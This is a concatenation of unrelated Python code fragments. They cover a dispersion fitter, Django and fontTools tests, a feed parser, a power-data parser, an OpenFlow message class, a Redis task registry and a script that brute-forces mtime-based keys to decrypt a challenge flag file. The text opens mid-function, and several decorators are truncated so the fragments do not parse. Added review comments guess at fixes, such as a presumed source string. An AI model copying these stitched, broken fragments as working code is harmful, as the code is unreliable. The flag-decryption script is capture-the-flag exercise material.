    (medium, rms) = fitter.fit(num_tries=20)
    fitter = FastDispersionFitter.from_file('tests/data/nk_data.csv', skiprows=1, delimiter=',')
    # BUG FIX: the original passed ``advanced_param=advanced_param`` where
    # ``advanced_param`` was never defined in this scope (NameError at
    # runtime). Fall back to the fitter's default advanced parameters;
    # restore an explicit AdvancedFastFitterParam if one was intended.
    (medium, rms) = fitter.fit()
# NOTE(review): the decorator below is truncated — the leading
# "@pytest.mark" was lost in extraction; confirm against the original
# file. As written this fragment does not parse on its own.
.django_db(transaction=True)
def test_download_transactions_new_awards_only(client, monkeypatch, download_test_data, elasticsearch_transaction_index):
    """POSTing a transactions download with a 'new_awards_only' time period
    must succeed and return a .zip file URL."""
    setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index)
    # Point download generation at the dedicated download DB alias.
    download_generation.retrieve_db_string = Mock(return_value=get_database_dsn_string(settings.DOWNLOAD_DB_ALIAS))
    resp = client.post('/api/v2/download/transactions/', content_type='application/json', data=json.dumps({'filters': {'time_period': [{'date_type': 'new_awards_only', 'start_date': '2017-12-31', 'end_date': '2018-01-02'}]}}))
    assert (resp.status_code == status.HTTP_200_OK)
    assert ('.zip' in resp.json()['file_url'])
def extractSultricWordpressCom(item):
    """Build a release message for a sultric.wordpress.com feed item.

    Returns None for previews or items without chapter/volume info, a
    release message when a known tag matches, and False otherwise.
    """
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    if not (chp or vol) or 'preview' in title.lower():
        return None
    # (tag to look for, canonical series name, translation type)
    tagmap = [
        ('Sy', 'seducing you', 'translated'),
        ('seducing you', 'seducing you', 'translated'),
        ('bpetit', "being papa'd every time i transmigrate", 'translated'),
        ("being papa'd every time i transmigrate", "being papa'd every time i transmigrate", 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    tags = item['tags']
    for tagname, name, tl_type in tagmap:
        if tagname not in tags:
            continue
        return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def get_spark_session() -> 'pyspark.sql.SparkSession':
    """Get or create a local SparkSession for foundry-dev-tools.

    Runs on all local cores and enables Arrow-based pandas conversion
    (with fallback) for faster DataFrame interchange.
    """
    builder = pyspark.sql.SparkSession.builder.master('local[*]').appName('foundry-dev-tools')
    session = builder.getOrCreate()
    arrow_options = (
        'spark.sql.execution.arrow.pyspark.enabled',
        'spark.sql.execution.arrow.pyspark.fallback.enabled',
    )
    for option in arrow_options:
        session.conf.set(option, 'true')
    return session
class TestWorksheetInsertColumn(unittest.TestCase):
    """Tests for Worksheet.insertColumn.

    Worksheet rows are tab-separated strings in ``ws.data``; inserting past
    the current width pads with tabs, and columns longer than the existing
    data extend the sheet with partially-empty rows.
    """

    def setUp(self):
        self.wb = Workbook()

    def test_insert_first_column_into_empty_sheet(self):
        # Inserting at index 0 into an empty sheet creates one column.
        ws = self.wb.addSheet('test sheet')
        self.assertEqual(len(ws.data), 0)
        self.assertEqual(ws.ncols, 0)
        column = ['1', '2', '3']
        ws.insertColumn(0, insert_items=column)
        self.assertEqual(len(ws.data), 3)
        self.assertEqual(ws.ncols, 1)
        for i in range(len(column)):
            self.assertEqual(str(column[i]), ws.data[i])

    def test_insert_second_column_into_empty_sheet(self):
        # Inserting at index 1 pads a leading empty column with tabs.
        ws = self.wb.addSheet('test sheet')
        self.assertEqual(len(ws.data), 0)
        self.assertEqual(ws.ncols, 0)
        column = ['1', '2', '3']
        ws.insertColumn(1, insert_items=column)
        self.assertEqual(len(ws.data), 3)
        self.assertEqual(ws.ncols, 2)
        for i in range(len(column)):
            self.assertEqual(('\t' + str(column[i])), ws.data[i])

    def test_insert_column_into_sheet_with_data(self):
        # A 3-item column into 2 existing rows appends a third, sparse row.
        ws = self.wb.addSheet('test sheet')
        data = ['1\t2\t3', '4\t5\t6']
        ws.addTabData(data)
        self.assertEqual(len(ws.data), 2)
        self.assertEqual(ws.ncols, 3)
        column = ['1', '2', '3']
        ws.insertColumn(1, insert_items=column)
        self.assertEqual(len(ws.data), 3)
        self.assertEqual(ws.ncols, 4)
        new_data = ['1\t1\t2\t3', '4\t2\t5\t6', '\t3']
        for i in range(len(new_data)):
            self.assertEqual(new_data[i], ws.data[i])

    def test_insert_column_into_sheet_with_data_single_value(self):
        # A scalar insert_items value is broadcast to every existing row.
        ws = self.wb.addSheet('test sheet')
        data = ['1\t2\t3', '4\t5\t6']
        ws.addTabData(data)
        self.assertEqual(len(ws.data), 2)
        self.assertEqual(ws.ncols, 3)
        value = '7'
        ws.insertColumn(1, insert_items=value)
        self.assertEqual(len(ws.data), 2)
        self.assertEqual(ws.ncols, 4)
        new_data = ['1\t7\t2\t3', '4\t7\t5\t6']
        for i in range(len(new_data)):
            self.assertEqual(new_data[i], ws.data[i])

    def test_insert_titled_column_into_empty_sheet(self):
        # With a title, the title becomes the first cell of the new column.
        ws = self.wb.addSheet('test sheet')
        self.assertEqual(len(ws.data), 0)
        self.assertEqual(ws.ncols, 0)
        title = 'hello'
        column = ['1', '2']
        ws.insertColumn(1, title=title, insert_items=column)
        self.assertEqual(len(ws.data), 3)
        self.assertEqual(ws.ncols, 2)
        new_data = ['\thello', '\t1', '\t2']
        for i in range(len(new_data)):
            self.assertEqual(new_data[i], ws.data[i])

    def test_insert_titled_column_into_sheet_with_data(self):
        ws = self.wb.addSheet('test sheet')
        data = ['1\t2\t3', '4\t5\t6', '7\t8\t9']
        ws.addTabData(data)
        self.assertEqual(len(ws.data), 3)
        self.assertEqual(ws.ncols, 3)
        title = 'hello'
        column = ['1', '2']
        ws.insertColumn(1, title=title, insert_items=column)
        self.assertEqual(len(ws.data), 3)
        self.assertEqual(ws.ncols, 4)
        new_data = ['1\thello\t2\t3', '4\t1\t5\t6', '7\t2\t8\t9']
        for i in range(len(new_data)):
            self.assertEqual(new_data[i], ws.data[i])

    def test_insert_long_titled_column_into_sheet_with_data(self):
        # Title + column longer than existing rows: sheet grows a sparse row.
        ws = self.wb.addSheet('test sheet')
        data = ['1\t2\t3', '4\t5\t6']
        ws.addTabData(data)
        self.assertEqual(len(ws.data), 2)
        self.assertEqual(ws.ncols, 3)
        title = 'hello'
        column = ['1', '2']
        ws.insertColumn(1, title=title, insert_items=column)
        self.assertEqual(len(ws.data), 3)
        self.assertEqual(ws.ncols, 4)
        new_data = ['1\thello\t2\t3', '4\t1\t5\t6', '\t2']
        for i in range(len(new_data)):
            self.assertEqual(new_data[i], ws.data[i])
def reload_objects() -> None:
    """Roll the DB back one migration, seed legacy Taxonomy rows, re-upgrade.

    Used to reproduce the state an upgrade migration has to handle:
    downgrade to DOWN_REVISION, create 'outdated' objects, then migrate
    back to head.
    """
    cfg = get_alembic_config(DATABASE_URL)
    steps = (
        (f'> Rolling back one migration to: {DOWN_REVISION}', lambda: command.downgrade(cfg, DOWN_REVISION)),
        ("> Seeding the database with 'outdated' Taxonomy objects", create_outdated_objects),
        ('Upgrading database to migration revision: head', lambda: command.upgrade(cfg, 'head')),
    )
    for message, action in steps:
        print(message)
        action()
class CaretProcessor(util.PatternSequenceProcessor):
    """Inline processor for caret (``^``) markup: ``ins`` and ``sup`` runs.

    PATTERNS is ordered most-specific first: combined ins+sup forms are
    tried before the single-token forms so the longer matches win.
    """
    PATTERNS = [
        util.PatSeqItem(re.compile(INS_SUP, (re.DOTALL | re.UNICODE)), 'double', 'ins,sup'),
        util.PatSeqItem(re.compile(SUP_INS, (re.DOTALL | re.UNICODE)), 'double', 'sup,ins'),
        util.PatSeqItem(re.compile(INS_SUP2, (re.DOTALL | re.UNICODE)), 'double', 'ins,sup'),
        util.PatSeqItem(re.compile(INS_SUP3, (re.DOTALL | re.UNICODE)), 'double2', 'ins,sup'),
        util.PatSeqItem(re.compile(INS, (re.DOTALL | re.UNICODE)), 'single', 'ins'),
        # SUP2 is flagged (True) — tried before the plain SUP form.
        util.PatSeqItem(re.compile(SUP2, (re.DOTALL | re.UNICODE)), 'single', 'sup', True),
        util.PatSeqItem(re.compile(SUP, (re.DOTALL | re.UNICODE)), 'single', 'sup')
    ]
def fetch_production(zone_key: ZoneKey, session: Session=Session(), target_datetime: (datetime | None)=None, logger: Logger=getLogger(__name__)):
    """Fetch the live production breakdown for *zone_key*.

    Solar and wind are reported directly; everything else is attributed to
    'unknown' as consumption minus imports, solar and wind. Historical
    queries are not supported.
    """
    if target_datetime:
        raise NotImplementedError('This parser is not yet able to parse past dates.')
    query_data = query(session, logger, zone_key)
    # Residual generation = consumption - imports - solar - wind; rounded
    # to 13 decimals to suppress floating-point noise in the subtraction.
    query_data['leftoverMW'] = round((((query_data['consumptionMW'] - query_data['importMW']) - query_data['solarMW']) - query_data['windMW']), 13)
    prod_mix = ProductionMix()
    prod_mix.add_value('solar', query_data['solarMW'])
    prod_mix.add_value('wind', query_data['windMW'])
    prod_mix.add_value('unknown', query_data['leftoverMW'])
    prod_breakdown_list = ProductionBreakdownList(logger)
    # BUG FIX: this call was garbled ("source=' production=prod_mix)") and
    # did not parse — the source string literal was broken. Restored to a
    # complete keyword call; 'webaruba.com' is the presumed data source for
    # this parser — TODO confirm against the upstream repository.
    prod_breakdown_list.append(datetime=query_data['time'], zoneKey=zone_key, source='webaruba.com', production=prod_mix)
    return prod_breakdown_list.to_list()
def insert_album(disc, year, artist):
    """Insert an album row for *artist*; True on success, False on failure.

    The connection is always closed; database errors are printed and
    reported via the return value rather than raised.
    """
    conn = engine.connect()
    # Statement is built before the try block, matching the original:
    # a failure in id_artist() propagates to the caller.
    new_disc = discs.insert().values(artista_id=id_artist(artist), album=disc, ano=year)
    try:
        conn.execute(new_disc)
    except Exception as exc:
        print(exc)
        ok = False
    else:
        ok = True
    finally:
        conn.close()
    return ok
# NOTE(review): the line below is a truncated decorator — the leading
# "@unittest.skipUnless(" was lost in extraction; confirm against the
# original file. As written this fragment does not parse on its own.
((scipy or munkres), 'scipy or munkres not installed')
class InterpolatableTest(unittest.TestCase):
    """End-to-end tests for fontTools' ``interpolatable`` checker across
    TTF/OTF/UFO/designspace/Glyphs inputs, including sparse-master cases."""

    def __init__(self, methodName):
        unittest.TestCase.__init__(self, methodName)
        # Python 2 compatibility: alias the old assertRaisesRegexp name.
        if (not hasattr(self, 'assertRaisesRegex')):
            self.assertRaisesRegex = self.assertRaisesRegexp

    def setUp(self):
        # Temp dir is created lazily by temp_dir(); tracked for tearDown.
        self.tempdir = None
        self.num_tempfiles = 0

    def tearDown(self):
        if self.tempdir:
            shutil.rmtree(self.tempdir)

    # NOTE(review): no ``self`` parameter but called as ``self.get_test_input``
    # — a @staticmethod decorator was likely lost in formatting; confirm.
    def get_test_input(*test_file_or_folder):
        # Resolve paths inside the test 'data' directory next to this file.
        (path, _) = os.path.split(__file__)
        return os.path.join(path, 'data', *test_file_or_folder)

    # NOTE(review): same as above — likely a stripped @staticmethod.
    def get_file_list(folder, suffix, prefix=''):
        # Sorted absolute paths of files in *folder* matching prefix/suffix.
        all_files = os.listdir(folder)
        file_list = []
        for p in all_files:
            if (p.startswith(prefix) and p.endswith(suffix)):
                file_list.append(os.path.abspath(os.path.join(folder, p)))
        return sorted(file_list)

    def temp_path(self, suffix):
        """Return a fresh unique file path inside the (lazy) temp dir."""
        self.temp_dir()
        self.num_tempfiles += 1
        return os.path.join(self.tempdir, ('tmp%d%s' % (self.num_tempfiles, suffix)))

    def temp_dir(self):
        """Create the shared temp directory on first use."""
        if (not self.tempdir):
            self.tempdir = tempfile.mkdtemp()

    def compile_font(self, path, suffix, temp_dir):
        """Compile a .ttx source into a binary font; return (font, savepath)."""
        ttx_filename = os.path.basename(path)
        savepath = os.path.join(temp_dir, ttx_filename.replace('.ttx', suffix))
        font = TTFont(recalcBBoxes=False, recalcTimestamp=False)
        font.importXML(path)
        font.save(savepath, reorderTables=None)
        return (font, savepath)

    def test_interpolatable_ttf(self):
        # Compatible TTF masters: no problems expected (None result).
        suffix = '.ttf'
        ttx_dir = self.get_test_input('master_ttx_interpolatable_ttf')
        self.temp_dir()
        ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'TestFamily2-')
        for path in ttx_paths:
            self.compile_font(path, suffix, self.tempdir)
        ttf_paths = self.get_file_list(self.tempdir, suffix)
        self.assertIsNone(interpolatable_main(ttf_paths))

    def test_interpolatable_otf(self):
        # Same check for CFF-flavoured masters.
        suffix = '.otf'
        ttx_dir = self.get_test_input('master_ttx_interpolatable_otf')
        self.temp_dir()
        ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'TestFamily2-')
        for path in ttx_paths:
            self.compile_font(path, suffix, self.tempdir)
        otf_paths = self.get_file_list(self.tempdir, suffix)
        self.assertIsNone(interpolatable_main(otf_paths))

    def test_interpolatable_ufo(self):
        # UFO sources can be checked without compiling.
        ttx_dir = self.get_test_input('master_ufo')
        ufo_paths = self.get_file_list(ttx_dir, '.ufo', 'TestFamily2-')
        self.assertIsNone(interpolatable_main(ufo_paths))

    def test_designspace(self):
        designspace_path = self.get_test_input('InterpolateLayout.designspace')
        self.assertIsNone(interpolatable_main([designspace_path]))

    def test_glyphsapp(self):
        # Requires the optional glyphsLib dependency.
        pytest.importorskip('glyphsLib')
        glyphsapp_path = self.get_test_input('InterpolateLayout.glyphs')
        self.assertIsNone(interpolatable_main([glyphsapp_path]))

    def test_VF(self):
        # Sparse masters compiled to TTFs should still be interpolatable.
        suffix = '.ttf'
        ttx_dir = self.get_test_input('master_ttx_varfont_ttf')
        self.temp_dir()
        ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'SparseMasters-')
        for path in ttx_paths:
            self.compile_font(path, suffix, self.tempdir)
        ttf_paths = self.get_file_list(self.tempdir, suffix)
        problems = interpolatable_main((['--quiet'] + ttf_paths))
        self.assertIsNone(problems)

    def test_sparse_interpolatable_ttfs(self):
        # Sparse medium master: missing glyphs reported unless
        # --ignore-missing is passed (in any master ordering).
        suffix = '.ttf'
        ttx_dir = self.get_test_input('master_ttx_interpolatable_ttf')
        self.temp_dir()
        ttx_paths = self.get_file_list(ttx_dir, '.ttx', 'SparseMasters-')
        for path in ttx_paths:
            self.compile_font(path, suffix, self.tempdir)
        ttf_paths = self.get_file_list(self.tempdir, suffix)
        problems = interpolatable_main((['--quiet'] + ttf_paths))
        self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertIsNone(interpolatable_main((['--ignore-missing'] + ttf_paths)))
        self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ttf_paths[1]]) + [ttf_paths[0]]) + [ttf_paths[2]])))
        self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ttf_paths[0]]) + [ttf_paths[2]]) + [ttf_paths[1]])))

    def test_sparse_interpolatable_ufos(self):
        # Same sparse-master expectations for UFO sources.
        ttx_dir = self.get_test_input('master_ufo')
        ufo_paths = self.get_file_list(ttx_dir, '.ufo', 'SparseMasters-')
        problems = interpolatable_main((['--quiet'] + ufo_paths))
        self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertIsNone(interpolatable_main((['--ignore-missing'] + ufo_paths)))
        self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ufo_paths[1]]) + [ufo_paths[0]]) + [ufo_paths[2]])))
        self.assertIsNone(interpolatable_main((((['--ignore-missing'] + [ufo_paths[0]]) + [ufo_paths[2]]) + [ufo_paths[1]])))

    def test_sparse_designspace(self):
        designspace_path = self.get_test_input('SparseMasters_ufo.designspace')
        problems = interpolatable_main(['--quiet', designspace_path])
        self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'SparseMasters-Medium', 'master_idx': 1}])
        self.assertIsNone(interpolatable_main(['--ignore-missing', designspace_path]))

    def test_sparse_glyphsapp(self):
        # Glyphs sources report the master name with a space
        # ('Sparse Masters-Medium').
        pytest.importorskip('glyphsLib')
        glyphsapp_path = self.get_test_input('SparseMasters.glyphs')
        problems = interpolatable_main(['--quiet', glyphsapp_path])
        self.assertEqual(problems['a'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['s'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['edotabove'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}])
        self.assertEqual(problems['dotabovecomb'], [{'type': 'missing', 'master': 'Sparse Masters-Medium', 'master_idx': 1}])
        self.assertIsNone(interpolatable_main(['--ignore-missing', glyphsapp_path]))

    def test_interpolatable_varComposite(self):
        # Smoke test only: must not raise on a VarComposite font.
        input_path = self.get_test_input('..', '..', 'ttLib', 'data', 'varc-ac00-ac01.ttf')
        interpolatable_main((input_path,))
class flow_stats_entry(loxi.OFObject):
    """Auto-generated (loxigen) OpenFlow flow-stats entry.

    Wire layout (big-endian): length(2), table_id(1), pad(1),
    duration_sec(4), duration_nsec(4), priority(2), idle_timeout(2),
    hard_timeout(2), flags(2), pad(4), cookie(8), packet_count(8),
    byte_count(8), match, instruction list. Do not reorder fields —
    pack()/unpack() mirror this layout exactly.
    """

    def __init__(self, table_id=None, duration_sec=None, duration_nsec=None, priority=None, idle_timeout=None, hard_timeout=None, flags=None, cookie=None, packet_count=None, byte_count=None, match=None, instructions=None):
        # Generated style: every field defaults to its zero value when the
        # argument is omitted (``!= None`` comparisons are as generated).
        if (table_id != None):
            self.table_id = table_id
        else:
            self.table_id = 0
        if (duration_sec != None):
            self.duration_sec = duration_sec
        else:
            self.duration_sec = 0
        if (duration_nsec != None):
            self.duration_nsec = duration_nsec
        else:
            self.duration_nsec = 0
        if (priority != None):
            self.priority = priority
        else:
            self.priority = 0
        if (idle_timeout != None):
            self.idle_timeout = idle_timeout
        else:
            self.idle_timeout = 0
        if (hard_timeout != None):
            self.hard_timeout = hard_timeout
        else:
            self.hard_timeout = 0
        if (flags != None):
            self.flags = flags
        else:
            self.flags = 0
        if (cookie != None):
            self.cookie = cookie
        else:
            self.cookie = 0
        if (packet_count != None):
            self.packet_count = packet_count
        else:
            self.packet_count = 0
        if (byte_count != None):
            self.byte_count = byte_count
        else:
            self.byte_count = 0
        if (match != None):
            self.match = match
        else:
            self.match = ofp.match()
        if (instructions != None):
            self.instructions = instructions
        else:
            self.instructions = []
        return

    def pack(self):
        """Serialize to the OpenFlow wire format; returns the packed string.

        The length field is written as 0 first and patched in at the end
        once the total size is known.
        """
        packed = []
        packed.append(struct.pack('!H', 0))
        packed.append(struct.pack('!B', self.table_id))
        packed.append(('\x00' * 1))
        packed.append(struct.pack('!L', self.duration_sec))
        packed.append(struct.pack('!L', self.duration_nsec))
        packed.append(struct.pack('!H', self.priority))
        packed.append(struct.pack('!H', self.idle_timeout))
        packed.append(struct.pack('!H', self.hard_timeout))
        packed.append(struct.pack('!H', self.flags))
        packed.append(('\x00' * 4))
        packed.append(struct.pack('!Q', self.cookie))
        packed.append(struct.pack('!Q', self.packet_count))
        packed.append(struct.pack('!Q', self.byte_count))
        packed.append(self.match.pack())
        packed.append(loxi.generic_util.pack_list(self.instructions))
        length = sum([len(x) for x in packed])
        # Back-patch the length placeholder written above.
        packed[0] = struct.pack('!H', length)
        return ''.join(packed)

    # NOTE(review): takes ``reader`` (no self/cls) and builds a fresh
    # object — a @staticmethod decorator was likely lost in formatting;
    # confirm against the generated original.
    def unpack(reader):
        """Deserialize a flow_stats_entry from *reader* (wire format)."""
        obj = flow_stats_entry()
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Restrict the reader to this entry's bytes (length includes the
        # 2-byte length field itself).
        reader = orig_reader.slice(_length, 2)
        obj.table_id = reader.read('!B')[0]
        reader.skip(1)
        obj.duration_sec = reader.read('!L')[0]
        obj.duration_nsec = reader.read('!L')[0]
        obj.priority = reader.read('!H')[0]
        obj.idle_timeout = reader.read('!H')[0]
        obj.hard_timeout = reader.read('!H')[0]
        obj.flags = reader.read('!H')[0]
        reader.skip(4)
        obj.cookie = reader.read('!Q')[0]
        obj.packet_count = reader.read('!Q')[0]
        obj.byte_count = reader.read('!Q')[0]
        obj.match = ofp.match.unpack(reader)
        obj.instructions = loxi.generic_util.unpack_list(reader, ofp.instruction.instruction.unpack)
        return obj

    def __eq__(self, other):
        # Field-by-field structural equality, generated style.
        if (type(self) != type(other)):
            return False
        if (self.table_id != other.table_id):
            return False
        if (self.duration_sec != other.duration_sec):
            return False
        if (self.duration_nsec != other.duration_nsec):
            return False
        if (self.priority != other.priority):
            return False
        if (self.idle_timeout != other.idle_timeout):
            return False
        if (self.hard_timeout != other.hard_timeout):
            return False
        if (self.flags != other.flags):
            return False
        if (self.cookie != other.cookie):
            return False
        if (self.packet_count != other.packet_count):
            return False
        if (self.byte_count != other.byte_count):
            return False
        if (self.match != other.match):
            return False
        if (self.instructions != other.instructions):
            return False
        return True

    def pretty_print(self, q):
        """Render a human-readable dump of the entry via pretty-printer *q*."""
        q.text('flow_stats_entry {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('table_id = ')
                q.text(('%#x' % self.table_id))
                q.text(',')
                q.breakable()
                q.text('duration_sec = ')
                q.text(('%#x' % self.duration_sec))
                q.text(',')
                q.breakable()
                q.text('duration_nsec = ')
                q.text(('%#x' % self.duration_nsec))
                q.text(',')
                q.breakable()
                q.text('priority = ')
                q.text(('%#x' % self.priority))
                q.text(',')
                q.breakable()
                q.text('idle_timeout = ')
                q.text(('%#x' % self.idle_timeout))
                q.text(',')
                q.breakable()
                q.text('hard_timeout = ')
                q.text(('%#x' % self.hard_timeout))
                q.text(',')
                q.breakable()
                q.text('flags = ')
                # Decode the flags bitmask into OFPFF_* names for display.
                value_name_map = {1: 'OFPFF_SEND_FLOW_REM', 2: 'OFPFF_CHECK_OVERLAP', 4: 'OFPFF_RESET_COUNTS', 8: 'OFPFF_NO_PKT_COUNTS', 16: 'OFPFF_NO_BYT_COUNTS', 128: 'OFPFF_BSN_SEND_IDLE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('cookie = ')
                q.text(('%#x' % self.cookie))
                q.text(',')
                q.breakable()
                q.text('packet_count = ')
                q.text(('%#x' % self.packet_count))
                q.text(',')
                q.breakable()
                q.text('byte_count = ')
                q.text(('%#x' % self.byte_count))
                q.text(',')
                q.breakable()
                q.text('match = ')
                q.pp(self.match)
                q.text(',')
                q.breakable()
                q.text('instructions = ')
                q.pp(self.instructions)
                q.breakable()
            q.text('}')
def main():
    """Brute-force decrypt a flag file keyed on its mtime.

    Tries timestamps from (mtime - SECONDS_TO_BRUTEFORCE) upward until the
    decrypted bytes are ASCII and start with TARGET_FIRST_LINE.
    """
    global TARGET_FIRST_LINE, SECONDS_TO_BRUTEFORCE
    parser = argparse.ArgumentParser(description='Decrypt encrypted flag file')
    parser.add_argument('flag_file', help='Encrypted flag file to encrypt')
    args = parser.parse_args()
    mtime = int(os.path.getmtime(args.flag_file))
    print('Flag was last modified at:', mtime)
    with open(args.flag_file, 'rb') as fh:
        ciphertext = fh.read()
    # Start below the observed mtime to tolerate clock drift either way.
    candidate = mtime - SECONDS_TO_BRUTEFORCE
    plaintext = None
    for _attempt in range(2 + SECONDS_TO_BRUTEFORCE):
        print('Bruteforcing w/ value:', candidate)
        decrypted = decrypt_flag(ciphertext, candidate)
        try:
            text = decrypted.decode('ascii')
        except UnicodeDecodeError:
            text = None
        if text is not None and text.startswith(TARGET_FIRST_LINE):
            plaintext = text
            break
        candidate += 1
    if plaintext is not None:
        print('Decrypted File:')
        print(plaintext)
    else:
        print('WTF - Could not decrypt file')
class BaseImageInspectorTool(EnableTestAssistant, UnittestTools):
    """Shared test harness for ImageInspectorTool + overlay behaviour.

    NOTE(review): ``self.plot`` is read in setUp but never created here —
    presumably a concrete subclass (or mixin) builds it before calling this
    setUp; confirm against the rest of the module.
    """

    def setUp(self):
        self.plot.bounds = [100, 100]
        # Mock the window so mouse events can be synthesized without a GUI.
        self.plot._window = self.create_mock_window()
        renderer = self.plot.plots['plot0'][0]
        self.tool = ImageInspectorTool(component=renderer)
        self.overlay = ImageInspectorOverlay(component=renderer, image_inspector=self.tool)
        self.overlay2 = CustomImageInspectorOverlay(component=renderer, image_inspector=self.tool)
        self.plot.active_tool = self.tool
        self.plot.do_layout()
        # Captured inspector event (set by store_inspector_event).
        self.insp_event = None

    def test_mouse_move_records_last_position(self):
        # Moves update last_mouse_position; leaving the plot does not.
        tool = self.tool
        self.assertEqual(tool.last_mouse_position, ())
        self.mouse_move(tool, 0, 0)
        self.assertEqual(tool.last_mouse_position, (0, 0))
        self.mouse_move(tool, 10, 10)
        self.assertEqual(tool.last_mouse_position, (10, 10))
        self.mouse_leave(tool, 1000, 1000)
        self.assertEqual(tool.last_mouse_position, (10, 10))

    def test_mouse_move_custom_overlay(self):
        # One mouse move fires exactly one new_value event and one overlay
        # text update; the observer is removed even if assertions fail.
        tool = self.tool
        tool.observe(self.store_inspector_event, 'new_value')
        try:
            self.assertIsNone(self.insp_event)
            with self.assertTraitChanges(tool, 'new_value', 1):
                with self.assertTraitChanges(self.overlay2, 'text', 1):
                    self.mouse_move(tool, 0, 0)
            self.assertEqual(self.overlay2.text, 'Position: (0, 0)')
        finally:
            tool.observe(self.store_inspector_event, 'new_value', remove=True)

    def store_inspector_event(self, event):
        # Trait-observer callback: remember the latest inspector payload.
        self.insp_event = event.new
class UserTasks(object):
    """Redis-backed registry of a user's async tasks.

    Per-user tasks live in a hash at ``<KEY_PREFIX>tasks-<user_id>``
    (task_id -> pickled task_info); the global set ``<KEY_PREFIX>tasks``
    tracks every known task id across users.
    """
    # Shared Redis client and the global "all tasks" set key.
    redis = cq.backend.client
    key_all = (KEY_PREFIX + 'tasks')
    __slots__ = ('user_id', 'key', 'data')

    def __init__(self, user_id):
        self.user_id = user_id
        # Per-user hash key.
        self.key = ((KEY_PREFIX + 'tasks-') + str(user_id))
        # Local cache of task_id -> task_info, filled by load().
        self.data = {}

    def __repr__(self):
        return ('<User: %s, Tasks: %s>' % (self.user_id, self.data.keys()))

    # NOTE(review): takes ``cls`` but no @classmethod decorator is visible —
    # likely lost in formatting; confirm against the original file.
    def exists(cls, task_id):
        """True when *task_id* is registered in the global task set."""
        return cls.redis.sismember(cls.key_all, task_id)

    # NOTE(review): same as above — presumably a @classmethod.
    def check(cls, task_id, timeout=CHECK_TIMEOUT, logger=logger):
        """Poll (with exponential backoff) until *task_id* appears in the
        global set; raise UserTaskError after *timeout* seconds."""
        wait = 0.5
        while True:
            if cls.exists(task_id):
                logger.info('Task "%s" was found in UserTasks', task_id)
                break
            if (wait > timeout):
                logger.error('Ou ou. Task "%s" was not registered in UserTasks. Failing after waiting for %s seconds.', task_id, wait)
                raise UserTaskError(('Task "%s" was not registered in user\'s task list' % task_id))
            # Escalate to warning once we have been waiting a while.
            if (wait > 1):
                logger.warn('Whoa! Task "%s" not found in UserTasks. Waiting for %s seconds', task_id, wait)
            else:
                logger.info('Whoa! Task "%s" not found in UserTasks. Waiting for %s seconds', task_id, wait)
            sleep(wait)
            wait *= 2

    def tasks(self):
        """Reload from Redis and return the task mapping."""
        return self.load()

    def tasklist(self):
        """Task ids registered for this user."""
        return self.redis.hkeys(self.key)

    def tasklist_all(self):
        """Task ids registered across all users."""
        return self.redis.smembers(self.key_all)

    def load(self):
        """Refresh the local cache from Redis (unpickling each entry)."""
        self.data.clear()
        for (task_id, task_info) in iteritems(self.redis.hgetall(self.key)):
            self.data[task_id] = pickle.loads(task_info)
        return self.data

    def get(self, task_id):
        """Return the unpickled task_info for *task_id*, or None."""
        task_info = self.redis.hget(self.key, task_id)
        if (task_info is not None):
            return pickle.loads(task_info)
        return None

    def add(self, task_id, task_info):
        """Register a still-running task; True if newly added.

        Raises UserTaskError when the task has already finished (its result
        would never be cleaned up otherwise).
        """
        ar = cq.AsyncResult(task_id)
        if ar.ready():
            raise UserTaskError(('Task "%s" cannot be registered in user\'s task list because it has already finished' % task_id))
        # Atomic: write the per-user hash entry and the global set together.
        pipe = self.redis.pipeline()
        pipe.hset(self.key, task_id, pickle.dumps(task_info))
        pipe.sadd(self.key_all, task_id)
        res = bool(pipe.execute()[0])
        if res:
            logger.info('Task %s added into %s', task_id, self.key)
        else:
            # hset returned 0: the field already existed and was updated.
            logger.warn('Task %s was updated in %s', task_id, self.key)
        return res

    def delete(self, task_id):
        """Unregister *task_id* from both structures; True if it existed."""
        pipe = self.redis.pipeline()
        pipe.hdel(self.key, task_id)
        pipe.srem(self.key_all, task_id)
        res = bool(pipe.execute()[0])
        if res:
            logger.info('Task %s removed from %s', task_id, self.key)
        else:
            logger.warn('Task %s was not removed from %s', task_id, self.key)
        return res

